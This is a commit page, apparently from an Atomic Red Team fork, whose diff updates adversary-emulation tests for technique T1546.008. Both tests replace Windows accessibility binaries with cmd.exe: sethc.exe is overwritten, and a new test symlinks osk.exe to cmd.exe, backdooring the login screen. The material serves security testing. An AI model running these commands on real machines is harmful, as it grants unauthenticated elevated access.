security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create Symbolic Link From osk.exe to cmd.exe (#2218)

Browse Source 
* Create Symbolic Link From osk.exe to cmd.exe

* Update T1546.008.yaml
This commit is contained in:
Carrie Roberts
2022-11-02 10:54:33 -07:00
committed by GitHub
parent 31d9ef273e
commit 8300ec7632
1 changed files with 26 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1546.008/T1546.008.yaml
+26 -2
View File
@@ -54,11 +54,35 @@ atomic_tests:
- windows
executor:
command: |
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd )
takeown /F C:\Windows\System32\sethc.exe /A
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
cleanup_command: |
copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
name: command_prompt
elevation_required: true
elevation_required: true
- name: Create Symbolic Link From osk.exe to cmd.exe
description: |
Replace accessiblity executable with cmd.exe to provide elevated command prompt from login screen without logging in.
supported_platforms:
- windows
executor:
command: |
IF NOT EXIST %windir%\System32\osk.exe.bak (copy %windir%\System32\osk.exe %windir%\System32\osk.exe.bak) ELSE ( pushd )
takeown /F %windir%\System32\osk.exe /A
icacls %windir%\System32\osk.exe /grant Administrators:F /t
del %windir%\System32\osk.exe
mklink %windir%\System32\osk.exe %windir%\System32\cmd.exe
cleanup_command: |
takeown /F %windir%\System32\osk.exe /A
icacls %windir%\System32\osk.exe /grant Administrators:F /t
del %windir%\System32\osk.exe
copy /Y %windir%\System32\osk.exe.bak %windir%\System32\osk.exe
icacls %windir%\system32\osk.exe /inheritance:d
icacls %windir%\system32\osk.exe /setowner "NT SERVICE\TrustedInstaller"
icacls %windir%\System32\osk.exe /grant "NT SERVICE\TrustedInstaller":F /t
icacls %windir%\system32\osk.exe /grant:r SYSTEM:RX
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
name: command_prompt
elevation_required: true